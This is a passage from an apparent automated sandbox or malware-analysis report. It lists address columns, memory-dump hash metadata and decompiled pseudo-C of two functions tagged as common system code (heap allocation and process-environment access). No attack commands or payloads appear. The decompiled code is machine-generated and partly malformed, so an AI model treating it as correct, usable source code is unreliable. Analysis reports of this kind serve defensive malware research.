                                                      0x0166d7d2
                                                      0x0166d7ca
                                                      0x016bb37c
                                                      0x016bb37e
                                                      0x016bb385
                                                      0x016bb38a
                                                      0x00000000
                                                      0x016bb38a
                                                      0x0166d742
                                                      0x0166d7f1
                                                      0x0166d7f8
                                                      0x016bb49b
                                                      0x016bb49b
                                                      0x0166d800
                                                      0x0166d837
                                                      0x0166d843
                                                      0x0166d845
                                                      0x0166d847
                                                      0x0166d84a
                                                      0x0166d84b
                                                      0x0166d84e
                                                      0x0166d857
                                                      0x0166d818
                                                      0x0166d824
                                                      0x0166d831
                                                      0x016bb4a5
                                                      0x016bb4ab
                                                      0x016bb4b3
                                                      0x016bb4b8
                                                      0x016bb4bb
                                                      0x00000000
                                                      0x016bb4c1
                                                      0x016bb4c1
                                                      0x016bb4c8
                                                      0x00000000
                                                      0x016bb4ce
                                                      0x016bb4d4
                                                      0x016bb4e1
                                                      0x016bb4e3
                                                      0x016bb4e5
                                                      0x00000000
                                                      0x016bb4eb
                                                      0x016bb4f0
                                                      0x016bb4f2
                                                      0x0166dac9
                                                      0x0166dacc
                                                      0x0166dacf
                                                      0x0166dad1
                                                      0x0166dd78
                                                      0x0166dd78
                                                      0x0166dcf2
                                                      0x00000000
                                                      0x0166dad7
                                                      0x0166dad9
                                                      0x0166dadb
                                                      0x00000000
                                                      0x00000000
                                                      0x0166dae1
                                                      0x0166dae1
                                                      0x0166dae4
                                                      0x0166dae6
                                                      0x016bb4f9
                                                      0x016bb4f9
                                                      0x016bb500
                                                      0x0166daec
                                                      0x0166daec
                                                      0x0166daf5
                                                      0x0166daf8
                                                      0x0166dafb
                                                      0x0166db03
                                                      0x0166db11
                                                      0x0166db16
                                                      0x0166db19
                                                      0x0166db1b
                                                      0x016bb52c
                                                      0x016bb531
                                                      0x016bb534
                                                      0x0166db21
                                                      0x0166db21
                                                      0x0166db24
                                                      0x0166dcd9
                                                      0x0166dce2
                                                      0x0166dce5
                                                      0x0166dd6a
                                                      0x0166dd6d
                                                      0x00000000
                                                      0x0166dd73
                                                      0x016bb51a
                                                      0x016bb51c
                                                      0x016bb51f
                                                      0x016bb524
                                                      0x00000000
                                                      0x016bb524
                                                      0x0166dce7
                                                      0x0166dce7
                                                      0x0166dce7
                                                      0x00000000
                                                      0x0166dce7
                                                      0x00000000
                                                      0x0166db2a
                                                      0x0166db2c
                                                      0x0166db31
                                                      0x0166db33
                                                      0x0166db36
                                                      0x0166db39
                                                      0x0166db3b
                                                      0x0166db66
                                                      0x0166db66
                                                      0x0166db3d
                                                      0x0166db3d
                                                      0x0166db3e
                                                      0x0166db46
                                                      0x0166db47
                                                      0x0166db49
                                                      0x0166db4c
                                                      0x0166db53
                                                      0x0166db55
                                                      0x0166db58
                                                      0x0166db5a
                                                      0x016bb50a
                                                      0x016bb50f
                                                      0x016bb512
                                                      0x0166db60
                                                      0x0166db60
                                                      0x0166db63
                                                      0x0166db63
                                                      0x00000000
                                                      0x0166db63
                                                      0x0166db5a
                                                      0x0166db3b
                                                      0x0166db24
                                                      0x0166db69
                                                      0x0166db69
                                                      0x0166db6c
                                                      0x0166db6f
                                                      0x0166db74
                                                      0x016bb557
                                                      0x016bb557
                                                      0x016bb55e
                                                      0x0166db7a
                                                      0x0166db7c
                                                      0x0166db7f
                                                      0x0166db82
                                                      0x0166db85
                                                      0x00000000
                                                      0x0166db8b
                                                      0x0166db8b
                                                      0x0166db8d
                                                      0x0166db9b
                                                      0x0166db9b
                                                      0x0166db9d
                                                      0x0166dba0
                                                      0x0166dba2
                                                      0x0166dba4
                                                      0x0166dba7
                                                      0x0166dba9
                                                      0x0166dbae
                                                      0x0166dbae
                                                      0x0166dbb1
                                                      0x0166dbb4
                                                      0x0166dbb4
                                                      0x0166dbb7
                                                      0x0166dbba
                                                      0x0166dcd2
                                                      0x0166dcd4
                                                      0x00000000
                                                      0x0166dbc0
                                                      0x0166dbc0
                                                      0x0166dbd2
                                                      0x0166dbd7
                                                      0x0166dbda
                                                      0x0166dbdd
                                                      0x0166dbdf
                                                      0x00000000
                                                      0x0166dbe5
                                                      0x0166dbe5
                                                      0x0166dbee
                                                      0x0166dbf1
                                                      0x016bb541
                                                      0x016bb544
                                                      0x00000000
                                                      0x016bb546
                                                      0x016bb546
                                                      0x00000000
                                                      0x016bb546
                                                      0x0166dbf7
                                                      0x0166dbf7
                                                      0x0166dbfd
                                                      0x0166dbfd
                                                      0x0166dbff
                                                      0x0166dc0b
                                                      0x0166dc15
                                                      0x0166dc1b
                                                      0x0166dc1d
                                                      0x0166dc21
                                                      0x0166dc21
                                                      0x0166dc23
                                                      0x0166dc23
                                                      0x0166dc26
                                                      0x0166dc29
                                                      0x0166dc2b
                                                      0x00000000
                                                      0x00000000
                                                      0x0166dc31
                                                      0x0166dc34
                                                      0x0166dc36
                                                      0x0166dcbf
                                                      0x0166dcbf
                                                      0x0166dcc2
                                                      0x00000000
                                                      0x0166dc3c
                                                      0x0166dc41
                                                      0x0166dc43
                                                      0x00000000
                                                      0x0166dc45
                                                      0x0166dc45
                                                      0x0166dc47
                                                      0x00000000
                                                      0x0166dc4d
                                                      0x0166dc4d
                                                      0x0166dc50
                                                      0x0166dc52
                                                      0x0166dc55
                                                      0x0166dcfa
                                                      0x0166dcfe
                                                      0x0166dd08
                                                      0x0166dd0a
                                                      0x0166dd0c
                                                      0x00000000
                                                      0x0166dd12
                                                      0x0166dd15
                                                      0x0166dd2d
                                                      0x0166dd2f
                                                      0x0166dd32
                                                      0x0166dd35
                                                      0x00000000
                                                      0x0166dd35
                                                      0x0166dc5b
                                                      0x0166dc5b
                                                      0x0166dc5e
                                                      0x0166dc61
                                                      0x0166dc64
                                                      0x0166dc67
                                                      0x0166dc67
                                                      0x0166dc6a
                                                      0x0166dc6c
                                                      0x0166dc8e
                                                      0x0166dc8e
                                                      0x0166dc91
                                                      0x0166dc93
                                                      0x0166dcce
                                                      0x0166dcce
                                                      0x0166dc95
                                                      0x0166dc9c
                                                      0x0166dc6e
                                                      0x0166dc72
                                                      0x0166dc75
                                                      0x0166dc77
                                                      0x0166dc79
                                                      0x016bb551
                                                      0x016bb551
                                                      0x00000000
                                                      0x0166dc7f
                                                      0x0166dc7f
                                                      0x0166dc81
                                                      0x00000000
                                                      0x0166dc83
                                                      0x0166dc86
                                                      0x0166dc88
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0166dc88
                                                      0x0166dc81
                                                      0x0166dc79
                                                      0x0166dc6c
                                                      0x0166dc55
                                                      0x0166dc47
                                                      0x0166dc43
                                                      0x00000000
                                                      0x0166dc36
                                                      0x0166dc23
                                                      0x00000000
                                                      0x0166dbff
                                                      0x0166dbf1
                                                      0x0166dbdf
                                                      0x0166db8f
                                                      0x0166db92
                                                      0x0166db95
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0166db95
                                                      0x0166db8d
                                                      0x0166db85
                                                      0x0166db74
                                                      0x0166dc9f
                                                      0x0166dca2
                                                      0x0166dcb0
                                                      0x0166dcb0
                                                      0x0166dad1
                                                      0x016bb4e5
                                                      0x016bb4c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0166d831
                                                      0x00000000
                                                      0x0166d800
                                                      0x016bb47f
                                                      0x016bb485
                                                      0x00000000
                                                      0x016bb485
                                                      0x0166d665
                                                      0x0166d652
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfccf69cf831af42d21967193dc33c074aaacdc85535d43863bf26725a368b98
                                                      • Instruction ID: 1c68c04f20a0fe508ec471e7bd8786cc9327a269746542ce42a9c157ecd96ef8
                                                      • Opcode Fuzzy Hash: dfccf69cf831af42d21967193dc33c074aaacdc85535d43863bf26725a368b98
                                                      • Instruction Fuzzy Hash: EBE1DE70B0125ACFEB208F68CC94BB9BBBABF41314F0541ADD94997391D734AD81CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166849B, Relevance: .3, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E0166849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x172f9c0);
				E016AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1747b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0166CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01672280( *[fs:0x30], 0x1748550);
						_t139 =  *0x1747b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0168F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0166FFB0(_t193, _t235, 0x1748550);
								L5:
								return E016AD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01651C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1747b9c; // 0x0
							_t235 = L01674620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1747b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0168A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0166FFB0(_t193, _t235, 0x1748550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L016777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L016777F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1747b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1747b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E016937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1747b9c; // 0x0
									_t214 = L01674620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E016937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1747b10 =  *0x1747b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1747b04 =  *0x1747b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L016777F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L016777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1747b08 =  *0x1747b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E016957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0169F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L016777F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0168A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L016777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E016996C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                      0x0166849b
                                                      0x0166849b
                                                      0x0166849b
                                                      0x0166849b
                                                      0x0166849d
                                                      0x016684a2
                                                      0x016684a7
                                                      0x016684b1
                                                      0x016684d8
                                                      0x00000000
                                                      0x016684b3
                                                      0x016684c4
                                                      0x016684c9
                                                      0x016684cd
                                                      0x016684cf
                                                      0x016684cf
                                                      0x016684d6
                                                      0x016684e6
                                                      0x016684e9
                                                      0x016684ec
                                                      0x016684ef
                                                      0x016684f2
                                                      0x016684f4
                                                      0x016684fc
                                                      0x01668501
                                                      0x01668506
                                                      0x01668509
                                                      0x016686e0
                                                      0x016686e5
                                                      0x016686e8
                                                      0x016686ed
                                                      0x016686f0
                                                      0x016686f2
                                                      0x016b9afd
                                                      0x016b9b02
                                                      0x016684da
                                                      0x016684df
                                                      0x016684df
                                                      0x016686fa
                                                      0x016686fd
                                                      0x016686fe
                                                      0x01668701
                                                      0x01668706
                                                      0x01668709
                                                      0x0166870b
                                                      0x00000000
                                                      0x00000000
                                                      0x01668711
                                                      0x01668725
                                                      0x01668727
                                                      0x0166872a
                                                      0x0166872c
                                                      0x016b9af0
                                                      0x016b9af5
                                                      0x01668732
                                                      0x01668732
                                                      0x01668732
                                                      0x01668735
                                                      0x01668737
                                                      0x01668515
                                                      0x01668515
                                                      0x01668518
                                                      0x0166851d
                                                      0x01668523
                                                      0x01668527
                                                      0x0166852b
                                                      0x01668537
                                                      0x01668539
                                                      0x0166853c
                                                      0x0166853e
                                                      0x0166868c
                                                      0x01668691
                                                      0x01668699
                                                      0x0166869b
                                                      0x01668744
                                                      0x01668748
                                                      0x016686a1
                                                      0x016686a1
                                                      0x016686a1
                                                      0x016686a4
                                                      0x016686a8
                                                      0x016b9bdf
                                                      0x016b9bdf
                                                      0x016686ae
                                                      0x016686b0
                                                      0x00000000
                                                      0x016686b6
                                                      0x00000000
                                                      0x016b9be9
                                                      0x016686b0
                                                      0x01668544
                                                      0x0166854a
                                                      0x0166854d
                                                      0x01668551
                                                      0x0166876e
                                                      0x01668778
                                                      0x0166877b
                                                      0x01668780
                                                      0x01668557
                                                      0x01668557
                                                      0x0166855d
                                                      0x0166855d
                                                      0x0166856b
                                                      0x0166856e
                                                      0x01668570
                                                      0x01668573
                                                      0x01668576
                                                      0x01668576
                                                      0x01668579
                                                      0x0166857b
                                                      0x00000000
                                                      0x00000000
                                                      0x01668581
                                                      0x016685a0
                                                      0x016685a2
                                                      0x016685a5
                                                      0x016685a7
                                                      0x016b9b1b
                                                      0x016b9b1b
                                                      0x0166862e
                                                      0x0166862e
                                                      0x01668631
                                                      0x01668631
                                                      0x01668634
                                                      0x01668636
                                                      0x01668669
                                                      0x01668669
                                                      0x0166866b
                                                      0x016b9bbf
                                                      0x016b9bc4
                                                      0x016b9bc8
                                                      0x016b9bce
                                                      0x016b9bce
                                                      0x01668671
                                                      0x01668671
                                                      0x01668674
                                                      0x01668676
                                                      0x016b9bae
                                                      0x016b9bae
                                                      0x01668676
                                                      0x0166867c
                                                      0x0166867e
                                                      0x01668688
                                                      0x01668688
                                                      0x00000000
                                                      0x0166867e
                                                      0x01668638
                                                      0x01668638
                                                      0x0166863b
                                                      0x0166863e
                                                      0x0166863f
                                                      0x01668642
                                                      0x01668645
                                                      0x01668648
                                                      0x0166864d
                                                      0x016b9b69
                                                      0x016b9b6e
                                                      0x016b9b7b
                                                      0x016b9b81
                                                      0x016b9b85
                                                      0x016b9b89
                                                      0x016b9ba7
                                                      0x016b9b8b
                                                      0x016b9b91
                                                      0x016b9b9a
                                                      0x016b9b9f
                                                      0x016b9b9f
                                                      0x01668788
                                                      0x0166878d
                                                      0x01668763
                                                      0x01668763
                                                      0x01668766
                                                      0x00000000
                                                      0x01668766
                                                      0x016b9b70
                                                      0x00000000
                                                      0x016b9b70
                                                      0x01668656
                                                      0x0166865a
                                                      0x0166865c
                                                      0x01668752
                                                      0x01668756
                                                      0x00000000
                                                      0x00000000
                                                      0x0166875e
                                                      0x00000000
                                                      0x0166875e
                                                      0x01668662
                                                      0x01668662
                                                      0x01668662
                                                      0x01668666
                                                      0x00000000
                                                      0x01668666
                                                      0x016685b7
                                                      0x016685b9
                                                      0x016685bc
                                                      0x016685bf
                                                      0x016685cc
                                                      0x016685d1
                                                      0x016685d4
                                                      0x016685db
                                                      0x016685de
                                                      0x016685e0
                                                      0x016b9b5f
                                                      0x00000000
                                                      0x016b9b5f
                                                      0x016685e6
                                                      0x016685ea
                                                      0x016686c3
                                                      0x016686c5
                                                      0x016686c8
                                                      0x016686ca
                                                      0x016b9b16
                                                      0x00000000
                                                      0x016b9b16
                                                      0x016686d6
                                                      0x016685f6
                                                      0x016685f6
                                                      0x016685f9
                                                      0x01668602
                                                      0x01668606
                                                      0x0166860a
                                                      0x0166860b
                                                      0x0166860e
                                                      0x01668611
                                                      0x00000000
                                                      0x01668611
                                                      0x016685f3
                                                      0x00000000
                                                      0x016685f3
                                                      0x01668619
                                                      0x0166861e
                                                      0x0166861e
                                                      0x01668621
                                                      0x01668622
                                                      0x01668623
                                                      0x01668625
                                                      0x0166862c
                                                      0x00000000
                                                      0x0166873d
                                                      0x00000000
                                                      0x0166873d
                                                      0x01668737
                                                      0x0166850f
                                                      0x01668512
                                                      0x00000000
                                                      0x01668512
                                                      0x00000000
                                                      0x016684d6

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 89922696fa2d7992e6d0e8d7af5ec9e7f23bf191c1760c68a0c7a96d225afee2
                                                      • Instruction ID: f14b0a4630a93fbe8e73e6fcba48cc58b78c864f368a69657f43d6ebd0b0e570
                                                      • Opcode Fuzzy Hash: 89922696fa2d7992e6d0e8d7af5ec9e7f23bf191c1760c68a0c7a96d225afee2
                                                      • Instruction Fuzzy Hash: C9B119B4E00359DBDB15DFA9CD84AAEBBBABF48304F10412EE505AB345D770AD46CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168513A, Relevance: .3, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0168513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x174d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0169D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01672280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01674620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0169F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0166FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x174b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0169B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
